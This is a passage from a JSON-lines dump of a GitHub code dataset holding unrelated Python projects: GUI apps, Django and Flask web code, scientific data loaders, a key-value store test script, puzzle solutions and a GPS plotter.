self.st_btn_submit.setMinimumHeight(40)\n self.st_btn_submit.setMaximumWidth(300)\n\n self.st_lable_download_speed = QLabel(f'Download Speed: _ Mbps')\n self.st_lable_upload_speed = QLabel(f'Upload Speed: _ Mbps')\n self.st_lable_ping = QLabel(f'Ping: _ ms')\n\n def on_st_btn_submit():\n download_speed, upload_speed, ping = analyser.get_internet_speed()\n self.st_lable_download_speed.setText(\n f'Download Speed: {download_speed} Mbps')\n self.st_lable_upload_speed.setText(f'Upload Speed: {upload_speed} Mbps')\n self.st_lable_ping.setText(f'Ping: {ping} ms')\n\n self.st_btn_submit.clicked.connect(on_st_btn_submit)\n self.ui.load_pages.st_top_layout.addWidget(self.st_btn_submit)\n self.ui.load_pages.st_top_layout.addWidget(self.st_lable_download_speed)\n self.ui.load_pages.st_top_layout.addWidget(self.st_lable_upload_speed)\n self.ui.load_pages.st_top_layout.addWidget(self.st_lable_ping)\n\n # DNS\n # ////////////////////////////////////////////////\n self.dns_btn_submit = PyPushButton(\n text=\"Get Info\",\n radius=8,\n color=self.themes[\"app_color\"][\"text_foreground\"],\n bg_color=self.themes[\"app_color\"][\"dark_one\"],\n bg_color_hover=self.themes[\"app_color\"][\"dark_three\"],\n bg_color_pressed=self.themes[\"app_color\"][\"dark_four\"]\n )\n self.dns_btn_submit.setMinimumHeight(40)\n self.dns_btn_submit.setMaximumWidth(300)\n\n self.dns_sitename = PyLineEdit(place_holder_text=\"Enter domain name\")\n self.dns_lable = QTextEdit()\n\n def on_dns_btn_submit():\n domain_name = self.dns_sitename.text()\n domain_info = analyser.get_domain_info(domain_name)\n print(domain_info)\n self.dns_lable.setText(str(domain_info))\n self.dns_sitename.setText(\"\")\n\n self.dns_btn_submit.clicked.connect(on_dns_btn_submit)\n self.ui.load_pages.dns_top_layout.addWidget(self.dns_sitename)\n self.ui.load_pages.dns_top_layout.addWidget(self.dns_btn_submit)\n self.ui.load_pages.dns_main_layout.addWidget(self.dns_lable)\n\n # BTN 2\n # self.left_btn_2 = PyPushButton(\n # text=\"Btn With Icon\",\n # radius=8,\n # color=self.themes[\"app_color\"][\"text_foreground\"],\n # bg_color=self.themes[\"app_color\"][\"dark_one\"],\n # bg_color_hover=self.themes[\"app_color\"][\"dark_three\"],\n # bg_color_pressed=self.themes[\"app_color\"][\"dark_four\"]\n # )\n # self.icon = QIcon(Functions.set_svg_icon(\"icon_settings.svg\"))\n # self.left_btn_2.setIcon(self.icon)\n # self.left_btn_2.setMaximumHeight(40)\n # self.ui.left_column.menus.btn_2_layout.addWidget(self.left_btn_2)\n\n # RESIZE GRIPS AND CHANGE POSITION\n # Resize or change position when window is resized\n # ///////////////////////////////////////////////////////////////\n\n def resize_grips(self):\n if self.settings[\"custom_title_bar\"]:\n self.left_grip.setGeometry(5, 10, 10, self.height())\n self.right_grip.setGeometry(self.width() - 15, 10, 10, self.height())\n self.top_grip.setGeometry(5, 5, self.width() - 10, 10)\n self.bottom_grip.setGeometry(\n 5, self.height() - 15, self.width() - 10, 10)\n self.top_right_grip.setGeometry(self.width() - 20, 5, 15, 15)\n self.bottom_left_grip.setGeometry(5, self.height() - 20, 15, 15)\n self.bottom_right_grip.setGeometry(\n self.width() - 20, self.height() - 20, 15, 15)\n","repo_name":"Adnan-S-Husain/site-analyser","sub_path":"gui/uis/windows/main_window/setup_main_window.py","file_name":"setup_main_window.py","file_ext":"py","file_size_in_byte":17616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"29968377084","text":"import numpy as np\n\ndef measure_center_curvature(left_fit_coef, right_fit_coef, image_shape):\n \"\"\"\n It takes the polynomial functions and original image dimensions.\n It calculates the offset of the car from the center of the lanes and the curvature in meters.\n It returns the offset and a direction the car to go to and the right and left curvature of the road.\n \"\"\"\n\n # Conversions from pixels to meters\n ym_per_pix = 30/720 # meters per pixel in y dimension\n xm_per_pix = 3.7/700 # meters per pixel in x dimension\n\n ############ Calculating the car offset\n # Get the position of the car (in the middle of the image)\n car_center_x = image_shape[1] / 2 # the middle of the x_axis range\n\n # Get the x dimension of the center between the two lanes at the bottom of the image\n # by substituting in the 2nd order polynomial curve x = Ay^2 + By + C\n # where y is the maximum value at the bottom of the page\n left_lane_bottom_x = left_fit_coef[0] * (image_shape[0] ** 2) + left_fit_coef[1] * image_shape[1] + left_fit_coef[2]\n right_lane_bottom_x = right_fit_coef[0] * (image_shape[0] ** 2) + right_fit_coef[1] * image_shape[1] + \\\n right_fit_coef[2]\n lane_center_x = (left_lane_bottom_x + right_lane_bottom_x) / 2\n\n # Get the car_offset i.e the difference between the lane_center and car_center\n car_offset = (lane_center_x - car_center_x) * xm_per_pix # in meters\n car_offset = round(car_offset, 3)\n\n # Get the direction of the car offset\n direction = \"\"\n if car_offset > 0:\n direction = \"Go right\"\n elif car_offset < 0:\n direction = \"Go left\"\n else:\n direction = \"Stay put\"\n\n car_offset = np.absolute(car_offset)\n\n\n ############ Calculating the radius of curvature\n # Get the y (vertical, first dimension in image_shape) value where the curvature should calculated\n y_eval = image_shape[0] # the maximum value i.e the bottom of the image\n\n # Calculation of radius of curvature of 2nd order polynomial using the formula R = (1 + (2Ay + B)^2)^(3/2) / (|2A|)\n # where A and B are the polynomial coefficients 0 and 1 respectively\n # y is y_eval (where the radius should be calculated) * ym_per_pix to be in meters\n left_curve_rad = ((1 + (2*left_fit_coef[0]*y_eval*ym_per_pix + left_fit_coef[1])**2)**(3.0/2)) / np.absolute(2*left_fit_coef[0])\n right_curve_rad = ((1 + (2*right_fit_coef[0]*y_eval*ym_per_pix + right_fit_coef[1])**2)**(3.0/2)) / np.absolute(2*right_fit_coef[0])\n curvature = (left_curve_rad + right_curve_rad) / 2.0\n curvature = round(curvature, 3)\n\n return str(car_offset), direction, str(curvature)\n","repo_name":"Joy-Amir/Simple-Perception-Stack-for-SDCs","sub_path":"measure_center_curvature.py","file_name":"measure_center_curvature.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"341588714","text":"from django.shortcuts import render, HttpResponse\nfrom company.forms import JobForm\nfrom company.models import HR_bio, Application,Job\nfrom django.contrib.auth.decorators import login_required\nfrom user.models import Dev, Skill\n\n@login_required\ndef dashboard(request,username):\n if(request.user.type=='HR'):\n if(request.method==\"POST\"):\n query = request.POST['search']\n dev = Dev.objects.all().filter(username=query)\n res = Skill.objects.all()\n usernames = []\n for i in res:\n if(query in i.skill_string.split(',')):\n usernames.append(i.user.username)\n print(usernames)\n return render(request,'hrdash.html',{'dev':dev,'usernames':usernames})\n return render(request, 'hrdash.html')\n else:\n return render(request,'404.html')\n\n@login_required\ndef post_jobs(request):\n if(request.user.type=='HR'):\n if(request.method=='POST'):\n form = JobForm(request.POST)\n if(form.is_valid):\n form.save()\n return render(request,'application.html',{'message':'Job posting has been created!'})\n company = HR_bio.objects.all().filter(user=request.user)[0].works_for\n form = JobForm(initial={'company':company,'posted_by':request.user})\n return render(request,'create_job.html',{'form':form})\n else:\n return render(request,'404.html')\n\n\n@login_required\ndef posted_jobs(request):\n if(request.user.type=='HR'):\n jobs = Job.objects.all().filter(posted_by=request.user)\n return render(request,'posted_jobs.html',{'jobs':jobs})\n else:\n return render(request,'404.html')\n\n@login_required\ndef view_applications(request,id):\n if(request.user.type=='HR'):\n job = Job.objects.all().filter(id=id)\n applications = Application.objects.all().filter(job_name=job[0])\n return render(request,'applied_devs.html',{'applications':applications,'job':job[0]})\n else:\n render(request,'404.html')\n\n","repo_name":"hyre/server","sub_path":"company/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74041892369","text":"from tkinter import*\nfrom tkinter import ttk\nfrom PIL import Image,ImageTk\nfrom tkinter import messagebox\nimport mysql.connector\nfrom mysql.connector import cursor\nimport cv2\nimport os\nimport tkinter\n\n\nclass Developer:\n def __init__(self,root):\n self.root=root\n self.root.geometry(\"1368x768+0+0\")\n self.root.title(\"Developer Information\")\n\n title_lbl=Label(self.root,text=\"Developer\",font=(\"times new roman\",20,\"bold\"),bg=\"white\",fg=\"blue\")\n title_lbl.place(x=0,y=0,width=1368,height=35)\n \n #Back\n \n b1_1=Button(self.root,text=\"Back\",cursor=\"hand2\",command=self.Back,font=(\"times new roman\",15,\"bold\"),bg=\"white\",fg=\"black\")\n b1_1.place(x=1310,y=0,width=50,height=30)\n title_lbl_1=Label(self.root,text=\"DEVELOPED BY APURV A. RATHOD (ENROLLMENT NO:-180470107049)\",font=(\"times new roman\",12,\"bold\"),bg=\"white\",fg=\"green\")\n title_lbl_1.place(x=0,y=535,width=1368,height=35)\n\n img_top=Image.open(r'img\\dev.jpg')\n img_top=img_top.resize((1368,700),Image.ANTIALIAS)#High level to low\n self.photoimg_top=ImageTk.PhotoImage(img_top)\n\n f_lbl=Label(self.root,image=self.photoimg_top)\n f_lbl.place(x=0,y=35,width=1368,height=700)\n\n # Frame\n \n main_frame=Frame(f_lbl,bd=2,bg=\"white\")\n main_frame.place(x=800,y=0,width=600,height=600)\n\n img_top1=Image.open(r\"img\\APURV RATHOD.jpg\")\n img_top1=img_top1.resize((200,200),Image.ANTIALIAS)\n self.photoimg_top_tool=ImageTk.PhotoImage(img_top1)\n\n f_lbl=Label(main_frame,image=self.photoimg_top_tool)\n f_lbl.place(x=350,y=0,width=200,height=200)\n\n \n# Developer info\n\n dev_lebel=Label(main_frame,text='Hello my name, Apurv.',font=(\"times new roman\",13,\"bold\"),bg=\"white\")\n dev_lebel.place(x=0,y=5)\n\n dev_lebel=Label(main_frame,text='I am student of V.V.P Engineeimg college.',font=(\"times new roman\",13,\"bold\"),bg=\"white\")\n dev_lebel.place(x=0,y=40)\n\n dev_lebel=Label(main_frame,text='I am passionate about learn new things.',font=(\"times new roman\",13,\"bold\"),bg=\"white\")\n dev_lebel.place(x=0,y=75)\n\n img_top2=Image.open(r'img\\1_5TRuG7tG0KrZJXKoFtHlSg.jpeg')\n img_top2=img_top2.resize((600,390),Image.ANTIALIAS)#High level to low\n self.photoimg_top2=ImageTk.PhotoImage(img_top2)\n\n f_lbl=Label(self.root,image=self.photoimg_top2)\n f_lbl.place(x=800,y=270,width=600,height=390)\n\n def Back(self):\n self.root.destroy()\n\n\n\nif __name__ == \"__main__\":\n root =Tk()\n obj=Developer(root)\n root.mainloop()","repo_name":"APURV-23/Advanced-Attendance-System","sub_path":"Face_Recog/developer.py","file_name":"developer.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2241982254","text":"from flask_wtf import FlaskForm\nfrom wtforms import StringField, IntegerField, EmailField\nfrom wtforms.validators import DataRequired, Email, ValidationError\nfrom app.models import User\nfrom flask_login import current_user\n\n\ndef user_exists(form, field):\n # Checking if email exists\n email = field.data\n\n all_other_users = User.query.filter(User.id != str(current_user.id)).all()\n\n for user in all_other_users:\n if email == user.email:\n raise ValidationError('Email is already in use.')\n\n\ndef username_exists(form, field):\n # Checking if username is already in use\n #aaa\n username_input = field.data\n\n all_other_users = User.query.filter(User.id != str(current_user.id)).all()\n\n for user in all_other_users:\n if username_input == user.username:\n raise ValidationError('Username is already in use.')\n\ndef email_ending(form, field):\n email = field.data\n if not email.lower().endswith('.com'):\n raise ValidationError('Email must end with .com')\n\ndef zipcode_valid(form, field):\n zipcode = str(field.data)\n if len(zipcode) != 5:\n raise ValidationError(\"Zipcode must be a length of 5\")\n for char in zipcode:\n if not char.isdigit():\n raise ValidationError(\"Zipcode must only contain digits no letters\")\n\n\nclass ManageForm(FlaskForm):\n username = StringField('username', validators=[DataRequired(), username_exists])\n email = EmailField('email', validators=[DataRequired(), user_exists, email_ending])\n first_name = StringField('first_name', validators=[DataRequired()])\n last_name = StringField('last_name', validators=[DataRequired()])\n address = StringField('address', validators=[DataRequired()])\n city = StringField('city', validators=[DataRequired()])\n state = StringField('state', validators=[DataRequired()])\n zip_code = StringField('zip_code', validators=[DataRequired(), zipcode_valid])\n password = StringField('password', validators=[DataRequired()])\n","repo_name":"nathanrobertbaldwin/rignite","sub_path":"app/forms/manage_account_form.py","file_name":"manage_account_form.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"2074282126","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 26 22:29:22 2019\n\n@author: zqwu\n\"\"\"\n\nimport os\nimport numpy as np\n\ninput_raw = './DeepSEA/infile.vcf.out.funsig'\noutput = './output.varDeepSEA'\n\nf1 = open(input_raw, 'r')\nf2 = open(output, 'w')\n\nf2.write('Name,DeepSEAScore\\n')\ndat = {}\nfor i, line in enumerate(f1):\n if i==0:\n continue\n line = line.strip().split(',')\n dat[int(line[0])] = (line[1][3:] + '_' + line[2] + '_' + line[4] + '_' + line[5] + '_b37', float(line[-1]))\n\nfor k in sorted(dat.keys()):\n f2.write(dat[k][0] + ',' + str(dat[k][1]) + '\\n')\n\nf1.close()\nf2.close()","repo_name":"miaecle/eQTL_Trees","sub_path":"scripts/support_scripts/process_DeepSEA.py","file_name":"process_DeepSEA.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"5427160145","text":"import requests\nimport time\n\nREPLICA1_PORT = '8082'\nREPLICA2_PORT = '8083'\n\nREPLICA1_URL = 'http://localhost:8082/key-value-store-view'\nREPLICA2_URL = 'http://localhost:8083/key-value-store-view'\nREPLICA3_URL = 'http://localhost:8084/key-value-store-view'\n\n## Request functions\n\ndef getviewOp(url):\n # get the view from replica1\n response = requests.get(url)\n responseInJson = response.json()\n print(responseInJson)\n print(response.status_code)\n # put to the view from replica1\n\ndef putviewOp(url):\n response = requests.put(url, json={'socket-address' :'10.10.0.5:8085'})\n responseInJson = response.json()\n print(responseInJson)\n print(response.status_code)\n\ndef deleteviewOp(url):\n response = requests.delete(url, json={'socket-address' :'10.10.0.5:8085'})\n responseInJson = response.json()\n print(responseInJson)\n print(response.status_code)\n\n## run operations\ndef putkvOp(port, key, val, cm):\n response = requests.put('http://localhost:'+ port +'/key-value-store/' + key, json={'value' : val, 'causal-metadata': cm})\n responseInJson = response.json()\n print(responseInJson)\n print(response.status_code)\n return responseInJson['causal-metadata']\n\n\ndef getkvOp(port, key, cm):\n response = requests.get( 'http://localhost:'+ port +'/key-value-store/' + key, json={'causal-metadata': cm} )\n responseInJson = response.json()\n print(responseInJson)\n print(response.status_code)\n return responseInJson['causal-metadata']\n\ndef deletekvOp(port, key, cm):\n response = requests.delete('http://localhost:'+ port +'/key-value-store/' + key, json={'causal-metadata' : cm})\n responseInJson = response.json()\n print(responseInJson)\n print(response.status_code)\n return responseInJson['causal-metadata']\n\ndef putNode(port, key, socketAdd):\n response = requests.put('http://localhost:'+ port +'/key-value-store-shard/add-member/' + key, json={'socket-address' : socketAdd})\n responseInJson = response.json()\n print(responseInJson)\n print(response.status_code)\n\n\n## Unit Tests\n\n# Assume two empty replicas are running -- REPLICA1 and REPLICA2\ndef test1():\n lastCm = putkvOp(REPLICA1_PORT, \"alice\", \"I AM ALICE\", '')\n lastCm = putkvOp(REPLICA1_PORT, \"bob\", \"I AM BOB\", lastCm)\n\ndef test2():\n lastCm = putkvOp(REPLICA1_PORT, \"alice\", \"I AM ALICE\", '')\n lastCm = putkvOp(REPLICA2_PORT,'bob', 'I AM BOB', lastCm)\n\ndef test3():\n lastCm = putkvOp(REPLICA1_PORT, \"alice\", \"I AM ALICE\", '')\n lastCm = putkvOp(REPLICA1_PORT, \"bob\", \"I AM BOB\", lastCm)\n lastCm = putkvOp(REPLICA1_PORT, \"carol\", \"I AM CAROL\", lastCm)\n lastCm = deletekvOp(REPLICA2_PORT, \"carol\", lastCm)\n\ndef test4():\n lastCm = putkvOp(REPLICA1_PORT, \"alice\", \"I AM ALICE\", '')\n deletekvOp(REPLICA1_PORT, \"alice\", lastCm)\n\ndef test5():\n lastCm = putkvOp(REPLICA1_PORT, \"alice\", \"I AM ALICE\", '')\n lastCm = putkvOp(REPLICA1_PORT, \"bob\", \"I AM BOB\", lastCm)\n lastCm = putkvOp(REPLICA1_PORT, \"carol\", \"I AM CAROL\", lastCm)\n lastCm = getkvOp(REPLICA2_PORT, \"alice\", '')\n getkvOp(REPLICA1_PORT, \"alice\", '')\n\n\n\n\nif __name__ == '__main__':\n # test5()\n # # { '10.10.0.2': 0, '10.10.0.3': 0}\n # vc = putkvOp('8082', 'key0', 'value0', '')\n\n # vc = putkvOp('8083', 'key1', 'value1', vc)\n\n # vc = putkvOp('8084', 'key2', 'value2', vc)\n\n # vc = putkvOp('8085', 'key3', 'value3', vc)\n\n # vc = putkvOp('8082', 'key4', 'value4', vc)\n\n # vc = putkvOp('8083', 'key5', 'value5', vc)\n\n # vc = putkvOp('8084', 'key6', 'value6', vc)\n\n # vc = putkvOp('8085', 'key7', 'value7', vc)\n\n # vc = putkvOp('8082', 'key8', 'value8', vc)\n\n # vc = putkvOp('8083', 'key9', 'value9', vc)\n\n # vc = putkvOp('8084', 'key10', 'value10', vc)\n vc = ''\n for i in range(500):\n j = (i%6) + 2\n vc = putkvOp('808'+str(j), 'key'+str(i), 'value'+str(i), vc)\n\n for i in range(500):\n j = (i%6) + 2\n getkvOp('808'+str(j), 'key'+str(i), '')\n\n # putNode('8082', '1', '10.10.0.5:8085')\n # getviewOp(REPLICA1_URL)","repo_name":"swalcoff/Sharded-Distributed-System","sub_path":"tests/viewtest.py","file_name":"viewtest.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32108000396","text":"def groupSort(arr):\n result = []\n hmap = {}\n\n # Count unique integers using an hmap\n for i in arr:\n if i in hmap:\n hmap[i] += 1\n else:\n hmap[i] = 1\n\n # Place elements in a 2D array\n for k in hmap.keys():\n result.append([k, hmap[k]])\n\n temp = result.copy()\n\n # Sort the 2D array again\n print(f\"result before sorting: {result}\")\n result.sort(key=lambda y: (-y[1], y[0]))\n print(f\"-y[1], y[0]: \\t{result}\\n\")\n\n test = lambda x: (-x[1], x[0])\n\n for t in temp:\n print(f\"t: {t} | test: {test(t)}\")\n\n # result.sort(key=lambda y: (y[0], y[1]))\n # print(f\" y[0], y[1]: \\t{result}\")\n\n return hmap\n\n\nif __name__ == '__main__':\n example = [7, 12, 3, 12, 14]\n groupSort(example)\n","repo_name":"0x6f6f66/Algorithms-In-Python","sub_path":"Amazon/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74746515409","text":"import numpy as np\nfrom ase.io import read,write\nfrom ase.visualize import view\nimport h5py, sys\n#import quippy as qp\nimport ase\nimport os.path\nimport json\nfrom sklearn.preprocessing import scale\nfrom sklearn.feature_selection import SelectKBest, chi2, VarianceThreshold\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.linear_model import Lasso\n#sys.path.insert(0, 'ANI-1_release/')\nsys.path.insert(0,'../ANI-1_release/readers/lib/')\n\n#from ase.io import read,write\n#from ase.visualize import view\nimport pyanitools as pya\nsys.path.insert(0, './ml_tools/') #/local/switchdrive/semester_project_viano/scripts\nfrom ml_tools.descriptors import RawSoapInternal\nfrom ml_tools.models.KRR import KRR,TrainerCholesky,KRRFastCV\nfrom ml_tools.kernels import KernelPower,KernelSum\nfrom ml_tools.utils import get_mae,get_rmse,get_sup,get_spearman,get_score,load_pck,tqdm_cs\nfrom ml_tools.split import KFold,LCSplit,ShuffleSplit\nfrom ml_tools.compressor import FPSFilter\n\n\nfrom glob import glob\nfrom math_tools import *\n\nz2symb = {\n 1: 'H', 2: 'He', 3: 'Li', 4: 'Be', 5: 'B', 6: 'C', 7: 'N',\n 8: 'O', 9: 'F', 10: 'Ne', 11: 'Na', 12: 'Mg', 13: 'Al',\n 14: 'Si', 15: 'P',\n 16: 'S', 17: 'Cl', 18: 'Ar', 19: 'K', 20: 'Ca', 21: 'Sc',\n 22: 'Ti', 23: 'V', 24: 'Cr', 25: 'Mn', 26: 'Fe', 27: 'Co',\n 28: 'Ni', 29: 'Cu', 30: 'Zn', 31: 'Ga', 32: 'Ge', 33: 'As',\n 34: 'Se', 35: 'Br', 36: 'Kr', 37: 'Rb', 38: 'Sr', 39: 'Y',\n 40: 'Zr', 41: 'Nb', 42: 'Mo', 43: 'Tc', 44: 'Ru', 45: 'Rh',\n 46: 'Pd', 47: 'Ag', 48: 'Cd', 49: 'In', 50: 'Sn', 51: 'Sb',\n 52: 'Te', 53: 'I', 54: 'Xe', 55: 'Cs', 56: 'Ba', 57: 'La',\n 58: 'Ce', 59: 'Pr', 60: 'Nd', 62: 'Sm', 63: 'Eu', 64: 'Gd',\n 65: 'Tb', 66: 'Dy', 67: 'Ho', 68: 'Er', 69: 'Tm', 70: 'Yb',\n 71: 'Lu', 72: 'Hf', 73: 'Ta', 74: 'W', 75: 'Re', 76: 'Os',\n 77: 'Ir', 78: 'Pt', 79: 'Au', 80: 'Hg', 81: 'Tl', 82: 'Pb',\n 83: 'Bi'\n}\nsym2z = {sym:z for z,sym in z2symb.iteritems()}\n\nhartree2meV = 27.2114 * 1000\nself_energy = {1:-0.500607632585*hartree2meV,6:-37.8302333826*hartree2meV,\n 7:-54.5680045287*hartree2meV,8:-75.0362229210*hartree2meV}\n\ndef load_(frames_indices, path):\n fns = glob(path)\n print(fns)\n Nmol = []\n confstrides=[[] for _ in range(len(fns))]\n old_to_append = [0]\n for i,fn in enumerate(fns):\n Nconf = []\n with h5py.File(fn, 'r') as f:\n for key in f.keys():\n dset = f[key]\n Nmol.append(len(dset.keys()))\n for k,v in dset.items():\n Nconf.append(v['coordinates'].shape[0])\n Nmol,Nconf\n to_append = np.cumsum(Nconf)\n confstrides[i] = np.concatenate([confstrides[i],to_append])\n file_sep = np.cumsum([confstrides[i][-1] for i in range(len(fns))])\n local_ids = [[[] for _ in range(Nmol[i])] for i in range(len(fns))]\n for idx in frames_indices:\n ff = file_sep - idx\n ifile = len(ff[ff<0])\n if ifile > 0:\n aa = confstrides[ifile] - idx + file_sep[ifile - 1]\n else:\n aa = confstrides[ifile] - idx\n imol = len(aa[aa<0])\n local_ids[ifile][imol].append(aa[imol])\n frames = []\n labels = []\n mol_indices = []\n for i,fn in enumerate(fns):\n #print(i,fn)\n with h5py.File(fn, 'r') as f:\n for key in f.keys():\n #print(key)\n dset = f[key]\n for N, [(k,v),ids] in enumerate(zip(dset.items(),local_ids[i])):\n #print(N, k,v, ids)\n for ind in ids:\n pos = v['coordinates'][ind]\n energy = v['energies'][ind]\n S = v['species']\n #sm = v['smiles']\n\n numbers = np.array([sym2z[sym] for sym in S])\n #print(numbers)\n energy_components = 0\n for _, num in enumerate(numbers.astype(int)):\n energy_components += self_energy[num]\n frame = ase.Atoms( numbers=numbers[:].astype(int),\n positions=pos,\n pbc=False,cell=np.eye(3)*20,\n info=dict(E_unit='meV', pos_unit='angstrom'))\n frames.append(frame)\n labels.append((energy*hartree2meV - energy_components)/numbers.shape[0])\n mol_indices.append(file_sep[np.heaviside(i-1,0).astype(int)]*np.heaviside(i,0) + confstrides[i][np.heaviside(N-1,0).astype(int)]*np.heaviside(N,0) + ind)\n return frames, np.array(labels).reshape(len(frames),1), frames_indices.reshape(len(frames),1) #np.array(mol_indices).reshape(len(frames),1)\n\ndef FPS_reduction(frames):\n X = compute_soap_matrix(frames)\n # set up the kernel parameters\n kernel = KernelPower(zeta = 1)\n\n Nselect = 250\n compressor = FPSFilter(Nselect,kernel,act_on='feature',precompute_kernel=True,disable_pbar=True)\n compressor.fit(X,dry_run=True)\n\n indices = compressor.selected_ids\n min_distance2 = compressor.min_distance2\n\n return indices,min_distance2,X\n\ndef load_COMP(frame_indices):\n\n number_of_frames = len(frame_indices)\n frames = []*number_of_frames\n labels = np.zeros([number_of_frames,1])\n mol_indices = np.zeros([number_of_frames,1])\n with h5py.File('../ANI-1_release/molecules_COMP_dataset_1.hdf5', 'r') as f:\n for ind, iframe in enumerate(frame_indices):\n dset_energies = f[\"/\"+ str(iframe)]['energies']\n dset_indices = f[\"/\"+ str(iframe)]['indices']\n dset_numbers = f[\"/\"+ str(iframe)]['numbers']\n dset_positions = f[\"/\"+ str(iframe)]['positions']\n dset_labels = f[\"/\"+ str(iframe)]['labels']\n dset_formation_energies = f[\"/\"+ str(iframe)]['formation_energies']\n\n numbers=dset_numbers[:]\n positions=dset_positions[:,:]\n frame = ase.Atoms(numbers=dset_numbers[:].astype(int),\n positions=dset_positions[:,:],\n pbc=False,cell=np.eye(3)*20,\n info=dict(E_unit='meV', pos_unit='angstrom'))\n frames.append(frame)\n mol_indices[ind] = dset_indices\n labels[ind] = dset_formation_energies\n return frames, labels, mol_indices\n\ndef feature_reduction(X, Y, number_of_features, mode = 'VarianceThreshold'):\n if mode == 'VarianceThreshold':\n print(number_of_features)\n med_variance = np.median(np.std(X, axis = 0))\n\n sel = VarianceThreshold(threshold = med_variance )\n\n X_feature_matrix = sel.fit_transform(X)\n ind_selected = sel.get_support(indices = True)\n\n elif mode == 'Lasso':\n lasso = Lasso(alpha = 1e-7).fit(X, Y)\n model = SelectFromModel(lasso, prefit=True)\n X_feature_matrix = model.transform(X)\n ind_selected = model.get_support(indices = True)\n return X_feature_matrix, ind_selected\n","repo_name":"lviano/Comparison-of-Active-Learning-Methods-on-ANI-1-molecules-dataset","sub_path":"scripts/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":7162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70010392210","text":"from puzzle_input import read\n\ndata = read(\"input.txt\", ['\\n', ' '])\n\ncycle, x = 0, 1\ncheck = {20, 60, 100, 140, 180, 220}\nscreen = [['.'] * 40 for i in range(6)]\ntotal = 0\n\ndef draw_screen():\n row, column = cycle // 40, cycle % 40\n if cycle >= 240: return\n if abs(x - column) <= 1: screen[row][column] = \"#\"\n else: screen[row][column] = '.'\n\nfor line in data:\n cycle += 1\n if cycle in check: total += cycle * x\n if isinstance(line, list):\n draw_screen()\n cycle += 1\n if cycle in check: total += cycle * x\n x += line[1]\n draw_screen()\n\nprint(total)\nfor row in screen:\n print(''.join(row))","repo_name":"GoopyLotus5844/AdventOfCode2022","sub_path":"day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33891279401","text":"#!/usr/bin/env python3\n\n# -*- coding: utf-8 -*-\n\"\"\"\ngpsCat\n\n\"\"\"\n\nimport gpxpy\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport mplleaflet\nfrom mpl_toolkits.basemap import Basemap\n\ngpx_file = open('170507.GPX', 'r')\ngpx = gpxpy.parse(gpx_file)\ntrack_coords = []\n\nfor track in gpx.tracks:\n\tfor segment in track.segments:\n\t\tfor point in segment.points:\n\t\t\ttrack_coords.append((point.latitude, point.longitude, point.elevation, point.time))\n\ncat_track = pd.DataFrame(track_coords, columns=['Latitude','Longitude','Elevation','Time'])\n\n## Find the smallest and greatest coordinates, for plotting\nmaxlat = np.max(cat_track.Latitude)\nmaxlong = np.max(cat_track.Longitude)\nminlat = np.min(cat_track.Latitude)\nminlong = np.min(cat_track.Longitude)\n\nprint(maxlat, maxlong, minlat, minlong)\n\n## Standard plot with no background\n# plt.plot(cat_track['Longitude'],cat_track['Latitude'])\n# plt.show()\n\n## Can't get this working yet...\n# cat_track = cat_track.dropna()\n# fig = plt.figure(1)\n# plt.plot(cat_track['Longitude'], cat_track['Latitude'], color='darkorange', linewidth=5, alpha=0.5)\n# mplleaflet.display(fig=fig, tiles='esri_aerial')\n# plt.show() \n\n#\nm = Basemap(projection='merc', lat_0 = ((minlat + maxlat)/2.0), lon_0 = ((minlong + maxlong)/2.0),\n llcrnrlat = minlat,\n llcrnrlon = maxlong,\n urcrnrlat = maxlat,\n urcrnrlon = minlong,\n resolution='l', epsg=4326)\nm.fillcontinents(color='coral',lake_color='aqua')\n## Note this is an infuriating bug! must have cat_track.Latitude.values. If you don't, the latlon keyword causes random crashes.\nm.plot(cat_track.Longitude.values, cat_track.Latitude.values, linewidth=1.5, color='r', latlon=True)\nplt.title(\"catGPS track\")\nplt.show()\n\n# plt.plot(cat_track['Time'], cat_track['Elevation'])\n# plt.show()\n","repo_name":"Murray2015/gpscat","sub_path":"gpsCAT.py","file_name":"gpsCAT.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19505934118","text":"import hashlib\nimport json\nimport os\nimport random\nimport requests\n\nfrom .db_config import db\n\ndef init_db():\n with open('app/db/schema.sql', 'r') as f:\n sql = f.read()\n statements = sql.split(';')\n for statement in statements:\n db.execute(statement)\n init_bfv_weapons_db()\n\n\ndef init_bfv_weapons_db():\n # Getting API data. \n response_API = requests.get('https://api.gametools.network/bfv/weapons/?format_values=true&name=HAMINATOR1997&platform=pc&skip_battlelog=false&lang=en-us')\n data = response_API.text\n # Converting API data into JSON. \n jsonData = json.loads(data)\n\n # Assigning only weapons data into weapon variable\n weapons = jsonData[\"weapons\"]\n\n rows = db.execute(\"SELECT COUNT(*) FROM bfv_weapons\")\n # Get number of rows\n num_rows = 